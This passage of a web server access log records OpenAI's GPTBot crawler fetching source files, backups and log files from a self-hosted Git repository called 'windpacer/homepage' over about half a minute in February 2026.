"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:13:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:13:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:13:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 35827] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:13:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" -[17/Feb/2026:13:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9854] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" -[17/Feb/2026:13:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10925] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:13:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 11360] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:13:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 11394] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:13:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" [Client 74.7.227.38] [Length 16075] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" [Client 74.7.227.38] [Length 12950] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" -[17/Feb/2026:13:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fassets%2fimages" [Client 74.7.227.38] [Length 19560] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:13:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" [Client 74.7.227.38] [Length 11442] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:13:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:13:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" [Client 74.7.227.38] [Length 12971] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" -[17/Feb/2026:13:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13870] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" -[17/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" -[17/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 2190] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" -[17/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 2190] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" -[17/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fimages%2fdcsintegration.png" [Client 74.7.227.38] [Length 18949] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" [Client 74.7.227.38] [Length 10136] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" -[17/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" -[17/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" [Client 74.7.227.38] [Length 18812] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" -[17/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" [Client 74.7.227.38] [Length 9855] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" -[17/Feb/2026:13:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" [Client 74.7.227.38] [Length 14233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" -[17/Feb/2026:13:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" [Client 74.7.227.38] [Length 14388] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" -[17/Feb/2026:13:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" [Client 74.7.227.38] [Length 12999] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" -[17/Feb/2026:13:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13652] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" -[17/Feb/2026:13:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" -[17/Feb/2026:13:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" -[17/Feb/2026:13:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" -[17/Feb/2026:13:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" -[17/Feb/2026:13:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" [Client 74.7.227.38] [Length 12476] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" -[17/Feb/2026:13:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" -[17/Feb/2026:13:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429.patch" [Client 74.7.227.38] [Length 1191] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:13:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" -[17/Feb/2026:13:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11648] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11520] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" [Client 74.7.227.38] [Length 11343] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:22:07 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" [Client 74.7.227.38] [Length 13280] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" -[17/Feb/2026:13:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" -[17/Feb/2026:13:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12784] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11496] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" [Client 74.7.227.38] [Length 10614] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets" [Client 74.7.227.38] [Length 10360] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" -[17/Feb/2026:13:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" -[17/Feb/2026:13:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" -[17/Feb/2026:13:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" -[17/Feb/2026:13:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10859] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.tsx" -[17/Feb/2026:13:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" [Client 74.7.227.38] [Length 10978] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 